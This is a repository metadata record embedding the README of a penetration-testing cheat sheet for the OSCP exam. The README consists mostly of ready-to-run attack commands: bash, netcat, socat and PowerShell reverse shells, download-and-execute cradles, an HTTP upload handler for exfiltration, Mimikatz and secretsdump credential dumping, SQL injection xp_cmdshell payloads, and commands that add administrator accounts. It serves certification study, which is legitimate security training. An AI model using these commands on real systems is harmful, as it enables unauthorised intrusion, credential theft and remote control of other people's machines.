{"id":13842902,"url":"https://github.com/sinfulz/JustTryHarder","last_synced_at":"2025-07-11T17:32:22.106Z","repository":{"id":40584807,"uuid":"186368869","full_name":"sinfulz/JustTryHarder","owner":"sinfulz","description":"JustTryHarder, a cheat sheet which will aid you through the PWK course \u0026 the OSCP Exam. (Inspired by PayloadAllTheThings)","archived":false,"fork":false,"pushed_at":"2023-02-08T06:01:37.000Z","size":185,"stargazers_count":785,"open_issues_count":0,"forks_count":105,"subscribers_count":33,"default_branch":"master","last_synced_at":"2024-08-05T17:34:19.827Z","etag":null,"topics":["hacktoberfest","hacktoberfest-accepted","oscp","penetration","penetration-test","penetration-test-framework","penetration-testing","penetration-testing-tools","penetration-tests","pentest","pentest-environment","pentest-scripts","pentest-tool","pentest-tools","pentesters","pentesting","pentesting-networks","pentesting-tools","pentesting-windows","testing"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/sinfulz.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":null,"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"custom":null}},"created_at":"2019-05-13T07:36:18.000Z","updated_at":"2024-07-27T01:31:22.000Z","dependencies_parsed_at":"2024-01-08T08:56:39.710Z","dependency_job_id":null,"html_url":"https://github.com/sinfulz/JustTryHarder","commit_stats":null,"previous_names":[],"tags_count":0,"template":true,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sinfulz%2FJustTryHarder","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sinfulz%2FJustTryHarder/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sinfulz%2FJustTryHarder/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sinfulz%2FJustTryHarder/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/sinfulz","download_url":"https://codeload.github.com/sinfulz/JustTryHarder/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225745348,"owners_count":17517628,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacktoberfest","hacktoberfest-accepted","oscp","penetration","penetration-test","penetration-test-framework","penetration-testing","penetration-testing-tools","penetration-tests","pentest","pentest-environment","pentest-scripts","pentest-tool","pentest-tools","pentesters","pentesting","pentesting-networks","pentesting-tools","pentesting-windows","testing"],"created_at":"2024-08-04T17:01:50.292Z","updated_at":"2024-11-21T14:30:28.264Z","avatar_url":"https://github.com/sinfulz.png","language":"Python","readme":"# JustTryHarder\n\nJustTryHarder, a cheat sheet which will aid you through the PWK course \u0026 the OSCP Exam.\n\n(Inspired by PayloadAllTheThings)\n\nFeel free to submit a Pull Request \u0026 leave a star to share some love if this helped you. 💖\n\n**Hacktoberfest friendly!**\nYes, we are open to Pull Requests for Hacktoberfest! Please ensure its not spam and actually contributes well to this repo. Thanks \u0026 happy hacking!\n\nDisclaimer: None of the below includes spoilers for the PWK labs / OSCP Exam.\n\nCredit Info:\nI have obtained a lot of this info through other Github repos, blogs, sites and more.\nI have tried to give as much credit to the original creator as possible, if I have not given you credit please contact me on Twitter: https://twitter.com/s1nfulz\n\n## Determining the OS of a host via Ping\n\n---\n\n```\nping 10.10.10.110\nPING 10.10.10.110 (10.10.10.110) 56(84) bytes of data.\n64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms\n```\n\nThe `TTL` can be used to determine the OS of the host. The three different types of TTL are as shown below:\n\n-   TTL=64 = *nix - the hop count so if your getting 61 then there are 3 hops and its a *nix device. Most likely Linux.\n-   TTL=128 = Windows - again if the TTL is 127 then the hop is 1 and its a Windows box.\n-   TTL=254 = Solaris/AIX - again if the TTL is 250 then the hop count is 4 and its a Solaris box.\n\n## BOF (WIP)\n\n---\n\n(Typical bad characters include: 0x00, 0x0A, 0x0D)\n\n-   Fuzzing\n-   Finding eip position\n-   Finding bad chars\n-   Locating jmp esp\n-   Generating payload with msfvenom\n-   Getting reverse shell with netcat\n\nGood BOF resources:\n\n-   https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/\n-   https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/\n-   https://github.com/justinsteven/dostackbufferoverflowgood\n-   https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/\n\n## Breakouts / Environment Escapes\n\n---\n\n-   https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/\n-   https://sra.io/blog/sitekiosk-breakout/\n-   https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/\n-   https://cognosec.com/breaking-out-of-citrix-environment/\n-   https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/\n-   https://research.nccgroup.com/wp-content/uploads/2020/07/research-insights_common-issues-with-environment-breakouts.pdf\n-   https://gracefulsecurity.com/citrix-breakout/\n\n## DNS - Zone Transfers\n\n---\n\n-   host -t axfr HTB.local 10.10.10.10\n-   host -l HTB.local 10.10.10.10\n-   host -l \u003cdomain name\u003e \u003cname server\u003e\n-   dig @\u003cdns server\u003e \u003cdomain\u003e axfr\n\n## File Transfers\n\n---\n\n### SMB Transfer\n\nOn the Victim machine (Windows)\n\n```\nnet share \\\\10.10.10.10\\myshare\nnet use x:\ncopy whatever.zip x:\n```\n\n### Wget Transfer\n\nHow to retrieve file(s) from host (inside a reverse shell)\n\n```bash\n# Place file you want transferred in /var/www/html/\nservice apache2 start\n# Run on the remote server\n# wget http://10.10.10.10/pspy64 # \u003c- for single file\n# wget -r http://10.10.10.10/pspy64/ \u003c- for folder\n```\n\n### TFTP Transfer\n\n(How to transfer from Kali to Windows)\n\nUsing MSF.\n\nStart MSF before these steps:\n\nInside MSF\n\n1. `use auxiliary/server/tftp`\n2. `set TFTPROOT /usr/share/mimikatz/Win32/`\n3. `run`\n\nInside a terminal\n\n4. `tftp -i 10.10.10.10 GET mimikatz.exe`\n\n### NetCat (Windows to Kali)\n\n1. Windows: `nc -nv 10.11.0.61 4444 \u003c bank-account.zip`\n\n2. Linux: `nc -nlvp 4444 \u003e bank-account.zip`\n\n### PowerShell\n\n```ps\nInvoke-WebRequest -Uri http://127.0.0.1/exploit.py -OutFile C:\\Users\\Victim\\exploit.py\n```\n\nWithout an interactive powershell session:\n\n```ps\n# Create wget.ps1\n$client = New-Object System.Net.WebClient\n$path = \"C:\\path\\to\\save\\file.txt\"\n$client.DownloadFile($url, $path)\n```\n\n### Base64 (Linux -\u003e Linux)\n\nLocal Host:\n\n1. `$(echo \"cat /path/to/exploit.py | base64\") \u003e encoded.b64`\n2. Transfer `encoded.b64` to the remote server via `nc` or otherwise.\n\nRemote Server - Linux:\n\n3. `cat /path/to/encoded.b64 | base64 -d \u003e exploit.py`\n\nRemove Server - Powershell\n\n### Certutil\n\n```\ncertutil.exe -urlcache -split -f \"http://ip.for.kali.box/file-to-get.zip\" name-to-save-as.zip\n```\n\n### HTTP File Upload (Exfiltration)\n\nUpload:\n\n1. Create upload.php file in attacking machine webroot, `/var/www/html` by default.\n\n```php\n\u003c?php\n$uploaddir = '/var/www/uploads/';\n\n$uploadfile = $uploaddir . $_FILES['file']['name'];\n\nmove_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)\n?\u003e\n```\n\n2. Create upload directory and set appropriate permissions to allow upload.\n\n```bash\nsudo mkdir /var/www/uploads \u0026\u0026 sudo chown www-data:www-data /var/www/uploads\n```\n\n3. Upload file from victim machine to attacking machine using PowerShell:\n\n```ps\npowershell.exe -exec unrestricted -noprofile -Command \"(New-Object System.Net.WebClient).UploadFile('http://10.10.10.10/upload.php', 'file-to-upload.txt')\"\n```\n\n## Kerberoasting\n\n-   `GetUserSPNs.py -request -dc-ip \u003cDC_IP\u003e \u003cdomain\\user\u003e`\n\n-   `powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat`\n\n-   `impacket-secretsdump -just-dc-ntlm \u003cDOMAIN\u003e/\u003cUSER\u003e@\u003cDOMAIN_CONTROLLER\u003e -outputfile filename.hashes`\n\n## LFI / RFI\n\nPHP Reverse Shell:\n\n\u003c?phpexec(\"/bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/10.10.10/1234 0\u003e\u00261'\");\n\nCommand Injection:\n\u003c?php echo shell_exec(whoami);?\u003e\n\n-   For more info on LFI \u0026 RFI please refer to the LFI / RFI section at the top of the page ^\n\n## MSSQL / SQLi\n\n-   EXEC master..xp_cmdshell 'whoami';\n-   meh' exec master..xp_cmdshell 'whoami' --\n-   https://github.com/codingo/OSCP-2/blob/master/Documents/SQL%20Injection%20Cheatsheet.md\n-   http://pentestmonkey.net/category/cheat-sheet/sql-injection\n\n## Password Cracking\n\nHashcat\n\n-   `hashcat -m 500 -a 0 -o cracked_password.txt --force hash.txt /path/to/your/wordlist.txt`\n\nJohn The Ripper\n\n-   `john --rules --wordlist=/path/to/your/wordlist.txt hash.txt`\n\n## Password Spraying (CrackMapExec)\n\n-   `cme smb 10.10.10.10 -u username -d domain -p password`\n\n## Payload Generation\n\n-   [NETSEC - Creating Payloads](https://netsec.ws/?p=331)\n-   [MsfVenom Cheatsheet](http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/_)\n-   [Metasploit Unleashed Payloads](https://www.offensive-security.com/metasploit-unleashed/payloads/)\n-   [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)\n-   Non-staged: netcat\n-   Staged: multi/handler\n\n## PHP\n\n-   [The differences between `exec()`, `shell_exec`, `system()` and `passthru()`](https://stackoverflow.com/questions/20072696/what-is-different-between-exec-shell-exec-system-and-passthru-functions?lq=1)\n\n## Priv Esc - Linux\n\n# If GCC \u0026 wget is installed, the system MIGHT be vulnerable to a kernel exploit\n\n-   [Linux Kernel Exploits](https://github.com/SecWiki/linux-kernel-exploits)\n-   [GTFObins - Break ~~the f\\*\\*k~~ out of restricted shells](https://gtfobins.github.io)\n    -   GTFO Helper script: https://github.com/dreadnaughtsec/gtfo\n-   [Linux Exploit Suggester](https://github.com/InteliSecureLabs/Linux_Exploit_Suggester)\n-   [Linux Exploit Suggester 2](https://github.com/jondonas/linux-exploit-suggester-2)\n-   [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)\n-   `grep -Ri 'password' .`\n-   `find / -perm –4000 2\u003e/dev/null`\n-   `find / -perm -u=s 2\u003e/dev/null`\n-   `find / -user root -perm -4000 -exec ls -ldb {} \\;`\n-   `which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2\u003e/dev/null`\n    (then ls -la, look for 777 file permissions).\n-   Custom SUID binary. Requires code execution as the target user. Example: mysql sys_eval as root.\n\n```\n#include\u003cstdio.h\u003e\n#include\u003cunistd.h\u003e\n#include\u003csys/types.h\u003e\n\nint main(){\n    setuid(geteuid());\n    system(\"/bin/bash\");\n    return 0;\n}\n```\n\n## Priv Esc - Windows\n\n-   [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)\n-   [Windows Privilege Escalation Guide](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)\n-   [PowerUp / PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc)\n-   [Powerless - Enumeration Tool](https://github.com/M4ximuss/Powerless)\n-   [Local Privilege Escalation Workshop](https://github.com/sagishahar/lpeworkshop)\n-   [Just Another Windows (Enum) Script / JAWS](https://github.com/411Hall/JAWS)\n-   [Watson](https://github.com/rasta-mouse/Watson)\n-   [Sherlock](https://github.com/rasta-mouse/Sherlock) (Deprecated)\n-   [Windows Exploit Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)\n-   `churrasco -d \"net user /add \u003cusername\u003e \u003cpassword\u003e\"`\n-   `churrasco -d \"net localgroup administrators \u003cusername\u003e /add\"`\n-   `churrasco -d \"NET LOCALGROUP \"Remote Desktop Users\" \u003cusername\u003e /ADD\"`\n\n## Post Exploitation\n\n1. Mimikatz.exe (run it)\n2. privilege::debug\n3. sekurlsa::logonpasswords\n\n## Port Forwarding\n\n```\n• Local -- Forward local port to remote host.\n• Remote -- Forward remote port to local host.\n• Dynamic -- Use SOCKS.\n\nUse local if you have a service running on a machine that can be reached from the remote machine, and you want to access it directly from the local machine. After setting up the tunneling you will be able to access the service using your local host IP (127.0.0.1)\n\nUse remote if you have a service that can be reached from the local machine, and you need to make it available to the remote machine. It opens the listening socket on the machine you have used SSH to log into. \n\nDynamic is like local, but on the client side it behaves like a SOCKS proxy. Use it if you need to connect with a software that expects SOCKS forwarding.\n```\n\nChisel\nlocal system:\n\n```\n./chisel server -p 8080 --reverse\n```\n\nvictim:\n\n```\n./chisel client YOUR_IP:8080 R:1234:127.0.0.1:1234\n```\n\nPlink\n\n-   WIP\n\nSSH\n\n1. Generate an SSH key pair on the box being pivoted through to protect your credentials.\n\n```\nssh-keygen\ncat ~/.ssh/id_rsa.pub\n```\n\n2. Copy the pulic key output from the above command. Add this value and the pivot machine's IP address to the `~/.ssh/authorized_keys` file on your attacking (Kali) machine using the syntax below. If you do not already have this file, simple create a new file and add the contents below.\n\n```\nfrom=\"[VICTIM_MACHINE_IP_ADDRESS]\",command=\"echo 'This account can only be used for port forwarding'\",no-agent-forwarding,no-X11-forwarding,no-pty [PUBLIC_KEY_VALUE]\n```\n\n3. Ensure the SSH service is running on your attacking (Kali) machine.\n\n```\nsudo service ssh start\n```\n\n4. Initiate SSH call from the box being pivoted through and specify the `id_rsa` private key generated in step 1. This private key may be called something else if you changed the name when generating. Ensure the username and IP address of your attacking machine are correct.\n\n```\nssh -f -N -R 1080 -o \"UserKnownHostsFile=/dev/null\" -o \"StrictHostKeyChecking=no\" -i /[PATH_TO_YOUR_PRIVATE_KEY]/id_rsa kali@[ATTACKING_MACHINE_IP]\n```\n\n5. Edit your `/etc/proxychains.conf` file to add the line below.\n\n```\nsocks4 127.0.0.1 1080\n```\n\n6. Prepend the `proxychains` command to pivot through the compromised host using proxy chains. When scanning with `nmap`, be sure to use TCP Connect scans e.g.\n\n```\nsudo proxychains nmap -sT -p80 -sC -sV --open -Pn -n 10.10.10.10\n```\n\nAdditional Notes:\n\n-   ssh user@10.10.10.10 -R 1234:127.0.0.1:1234\n-   ssh -D 1337 -q -C -N -f user@10.10.10.10 (https://ma.ttias.be/socks-proxy-linux-ssh-bypass-content-filters)\n\n## Socks Proxy (using PowerShell)\n\nLocal\n\n-   vi /etc/proxychains.conf\n-   socks5 \u003cip\u003e 9080\n-   Import-Module .\\Invoke-SocksProxy.psm1\n-   Invoke-SocksProxy -bindPort 9080\n-   proxychains nmap -sT \u003cip\u003e\n\n## Port Scanning\n\nTCP\n\n-   reconnoitre -t 10.10.10.10 -o . --services --quick --hostnames\n-   nmap -vvv -sC -sV -p- --min-rate 2000 10.10.10.10\n-   nmap -sT -p 22,80,110 -A\n-   nmap -p- -iL ips.txt \u003e TCP_Ports.txt\n-   nc -v -n -z -w1 10.10.10.10 1-10000\n-   nmap -p- -iL ips.txt \u003e AllTCPPorts.txt\n\nUDP (can take hours so maybe netstat is a better alternative)\n\n-   nmap -sU --top-ports 10000\n-   nmap -sT -sU -p 22,80,110 -A\n-   nmap -sT -sU -p- --min-rate 2000\n-   nmap -p- -sU -iL ips.txt \u003e udp.txt\n-   nmap -sU -sV -iL ips.txt \u003e alludpports.txt\n\nSNMP\nnmap -p161 -sU -iL ips.txt \u003e udp.txt (cmd could be wrong, double check)\n\nSSH\nnmap --script ssh2-enum-algos -iL ips.txt \u003e SSH.txt\n\nSSL\nnmap -v -v --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt \u003e SSLScan.txt\n\nNMAP Bootstrap Report\nnmap -oA poison --stylesheet nmap-bootstrap.xsl 10.10.10.10\nfirefox nmap-bootstrap.xsl\n\n## Ping Sweep\n\n# Linux (basic one liners)\n\n-   for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep \"bytes from\" \u0026) ;done\n-   fping -g 192.168.0.1/24\n\n# Linux (script)\n\n```\nfor i in `seq 1 255`\ndo\n    ping -c1 192.168.125.$i 2\u003e/dev/null 1\u003e\u00262\n    if [[ $? -eq 0 ]]\n    then\n        echo 192.168.125.$i is up\n    fi\ndone\n```\n\n# Windows (cmd)\n\n-   for /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.1.%i \u003e nul \u0026\u0026 echo 192.168.1.%i is up.\n\n# Windows (PowerShell)\n\n-   $ping = New-Object System.Net.Networkinformation.Ping ; 1..254 | % { $ping.send(\"10.9.15.$\\_\", 1) | where status -ne 'TimedOut' | select Address | fl \\* }\n\n# Nmap\n\n-   nmap -sP 192.168.0.1-254\n\n## Pivoting\n\n-   sshuttle -r user@10.10.10.10 10.1.1.0/24\n\n## Remote Desktop\n\n-   rdesktop -u user -p password 10.10.10.10 -g 85% -r disk:share=/root/\n-   xfreerdp /d:xyz.local /u:username /p:password /v:10.10.10.10 /cert-ignore\n\n## Responder\n\n-   responder -I tun0 -wrF\n-   https://chryzsh.gitbooks.io/darthsidious/content/execution/responder-with-ntlm-relay-and-empire.html\n-   https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html\n\n## Reverse Shells\n\nLinux\n\n-   http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n-   https://awansec.com/reverse-shell.html\n-   https://www.revshells.com/\n\nWindows\n\n-   https://github.com/Dhayalanb/windows-php-reverse-shell\n-   nc 10.10.10.10 4444 –e cmd.exe\n-   https://www.revshells.com/\n\n## Shell Upgrading\n\nSource: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ \u0026 https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell\n\n## SQL Injection (SQLmap)\n\n-   sqlmap -u \"http://example.com/test.php?test=test\" --level=5 --risk=3 --batch\n\n#### Python\n\n1. python -c 'import pty;spawn(\"/bin/bash\");'\n   or\n1. python3 -c 'import pty;spawn(\"/bin/bash\");'\n1. In reverse shell:\n\n```\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\nCtrl-Z\n\n- In Kali\n\n3. stty raw -echo\n4. fg\n\n- In reverse shell\n5. reset (sometimes optional)\n6. export SHELL=bash\n7. export TERM=xterm-256color\n8. stty rows \u003cnum\u003e columns \u003ccols\u003e (optional)\n(Sometimes the command will need to be executed: export TERM=xterm)\n```\n\nUsing socat\n\n```\n#Listener:\nsocat file:`tty`,raw,echo=0 tcp-listen:4444\n#Victim:\nsocat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444\n```\n\n#### Perl\n\n1. perl -e 'exec \"/bin/sh\";'\n2. perl: exec \"/bin/sh\";\n\n#### Bash\n\n/bin/sh -i\n\n## Show listening ports\n\n-   Linux netstat syntax\n\n    1.  netstat -tulpn | grep LISTEN\n\n-   FreeBSD/MacOS X netstat syntax\n    1.  netstat -anp tcp | grep LISTEN\n    2.  netstat -anp udp | grep LISTEN\n-   OpenBSD netstat syntax\n\n    1.  netstat -na -f inet | grep LISTEN\n    2.  netstat -nat | grep LISTEN\n\n-   Nmap scan syntax\n    1.  sudo nmap -sT -O localhost\n    2.  sudo nmap -sU -O 192.168.2.13 ##[ list open UDP ports ]##\n    3.  sudo nmap -sT -O 192.168.2.13 ##[ list open TCP ports ]##\n\n## SMB - Enumeration\n\n-   https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html\n-   smbmap -H 10.10.10.10\n-   smbclient -L 10.0.0.10\n-   smbclient //10.10.10.10/share$\n\n## SMB - Impacket\n\n-   Impacket's PSEXEC (After creating a remote port fwd)\n    /usr/share/doc/python-impacket/examples/psexec.py user@10.10.10.10\n\nPassword: (password)\n\n[*] Trying protocol 445/SMB...\n\n-   Impacket's SMBServer (For File Transfer)\n\n1. cd /usr/share/windows-binaries\n2. python /usr/share/doc/python-impacket/examples/smbserver.py a .\n3. \\\\\\10.10.10.10\\a\\mimikatz.exe\n\n## SMTP Enumeration\n\nhttps://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt\n\n## ICMP Injection\n\n1. ping -n 3 10.10.10.10\n2. tcpdump -i tun0 icmp\n\n## VMware (not going full screen)\n\n`systemctl restart open-vm-tools.service`\n\n## Web Servers:\n\n-   python -m SimpleHTTPServer 80\n-   python3 -m http.server 80\n-   ngrok http \"file:///C:\\Users\\sinfulz\\Public Folder\"\n-   php -S 0.0.0.0:80\n\n## Web Scanning:\n\nWeb Scanning with extensions\n\nLinux (Example web server might be Apache)\n`gobuster dir -e -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,jsp,pl -s 200,204,301,302,307,403,401`\n\nWindows (Example web server might be IIS)\n\n`gobuster dir -e -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,asp,aspx,jsp,bak -s 200,204,301,302,307,403,401`\n\nLinux (Example web server might be Apache)\n\n`python3 dirsearch.py -r -u http://10.10.10.131/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,jsp,pl -t 50`\n\nWindows (Example web server might be IIS)\n\n`python3 dirsearch.py -r -u http://10.10.10.131/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,asp,aspx,jsp,bak -t 50`\n\nHTTP\n`gobuster dir -u http://10.10.10.10 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -t 69`\n\nHTTPS\n`gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69`\n(in some cases --wildcard will need to be used instead of -k)\n\nNikto\n`nikto -h 10.10.10.10 -p 80`\n\nNikto HTTPS\n``nikto -h 10.10.10.10 -p 443```\n\nWFuzz\n`wfuzz -u http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00 -w /usr/share/wfuzz/wordlist/general/common.txt`\n\n## Web Shells\n\n-   https://github.com/Arrexel/phpbash\n-   https://github.com/flozz/p0wny-shell\n\n## WordPress\n\n-   https://forum.top-hat-sec.com/index.php?topic=5758.0\n\n## Windows Framework / Powershell\n\nbypass PowerShell execution policy\n\n-   Bypassing execution policy and executing a script:\n    `powershell -ExecutionPolicy ByPass -File script.ps1`\n\n---\n\n-   https://github.com/samratashok/nishang\n-   https://github.com/rasta-mouse/Sherlock\n-   Reverse Powershell: (sometimes powershell or echo may need to be infront of the string and sometimes quotes may be needed, e.g. powershell IEX or powershell \"IEX..etc\" or echo IEX).\n\n```\npowershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\u003e\u00261 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '\u003e ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"\n```\n\n-   If one has a Command Prompt shell, this will grab PowerUp from a local web server and run it on the compromised shell:\n\n```\necho IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:80/PowerUp.ps1') | powershell -noprofile -\n```\n\n```\nIEX(New-object Net.WebClient).DownloadString('http://10.10.10.10:80/PowerUp.ps1')\n\n```\n\n```\npowershell -nop -exec bypass IEX \"(New-Object Net.WebClient).DownloadString('http://10.10.14.x/Whatever.ps1'); Invoke-Whatever\"\n```\n\n-   Reverse Powershell using mssql:\n\n```\nxp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring(\\\"http://10.10.10.10/Nishang-ReverseShell.ps1\\\")\n```\n\n-   File transfer with PowerShell:\n\n```\npowershell -c IEX(New-Object Net.WebClient).DownloadFile('http://server/path/to/file', 'nameforefile')`\n```\n\n## Windows Post Exploitation Commands\n\n-   WMIC USERACCOUNT LIST BRIEF\n-   net user\n-   net localgroup Users\n-   net localgroup Administrators\n-   net user USERNAME NEWPASS /add\n-   net user \"USER NAME\" NEWPASS /add\n-   net localgroup administrators USERNAME /add\n\nWriteable Directories\n\n# Windows\n\n---\n\nlist from https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md\nThe following folders are by default writable by normal users (depends on Windows version - This is from W10 1803)\n\n```\nC:\\Windows\\Tasks\nC:\\Windows\\Temp\nC:\\windows\\tracing\nC:\\Windows\\Registration\\CRMLog\nC:\\Windows\\System32\\FxsTmp\nC:\\Windows\\System32\\com\\dmp\nC:\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\nC:\\Windows\\System32\\spool\\PRINTERS\nC:\\Windows\\System32\\spool\\SERVERS\nC:\\Windows\\System32\\spool\\drivers\\color\nC:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\nC:\\Windows\\System32\\Tasks_Migrated (after peforming a version upgrade of Windows 10)\nC:\\Windows\\SysWOW64\\FxsTmp\nC:\\Windows\\SysWOW64\\com\\dmp\nC:\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\nC:\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\n```\n\n# Linux\n\nTo find World Writeable Directories in Linux use the command:\n`find / -xdev -type d \\( -perm -0002 -a ! -perm -1000 \\) -print`\n\n## Todo List:\n\n-   Improve the readability of the cheatsheet\n-   Fill in the empty sections\n-   Remove unnecessary sections\n-   Integrate the files in the repo into the cheatsheet\n-   Migrate to GitBook\n-   Include screenshots/gifs into the cheatsheet if needed\n-   Add a Table of Contents similar to PayloadAllTheThings' repos\n\n## Thank you:\n\n# Thanks to these people for including my cheatsheet on their website/blog:\n\n-   https://khaoticdev.net/cheatsheets/#collections\n-   https://www.facebook.com/ncybersec/posts/1541830509321001\n-   https://www.facebook.com/cyberg0100/posts/github-sinfulzjusttryharder-justtryharder-a-cheat-sheet-which-will-aid-you-throu/653235345249466\n-   https://www.reddit.com/r/CyberSpaceVN/comments/f3n2wp/github_sinfulzjusttryharder_justtryharder_a_cheat\n-   https://xn4k.github.io/pentest/PWK-course-\u0026-the-OSCP-Exam-Cheatsheet/\n-   https://opensourcelibs.com/libs/pentesting-tools\n-   https://gitmemory.com/brhannah\n-   https://www.bugbountytips.tech/2020/08/23/justtryharderpwk-cheatsheetkali-linux-cheatsheethydra-cheatsheetsecu-2/\n-   https://pythonlang.dev/category/oscp/\n","funding_links":[],"categories":["Python","Python (1887)","Resources"],"sub_categories":["Training and Certifications"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsinfulz%2FJustTryHarder","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsinfulz%2FJustTryHarder","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsinfulz%2FJustTryHarder/lists"}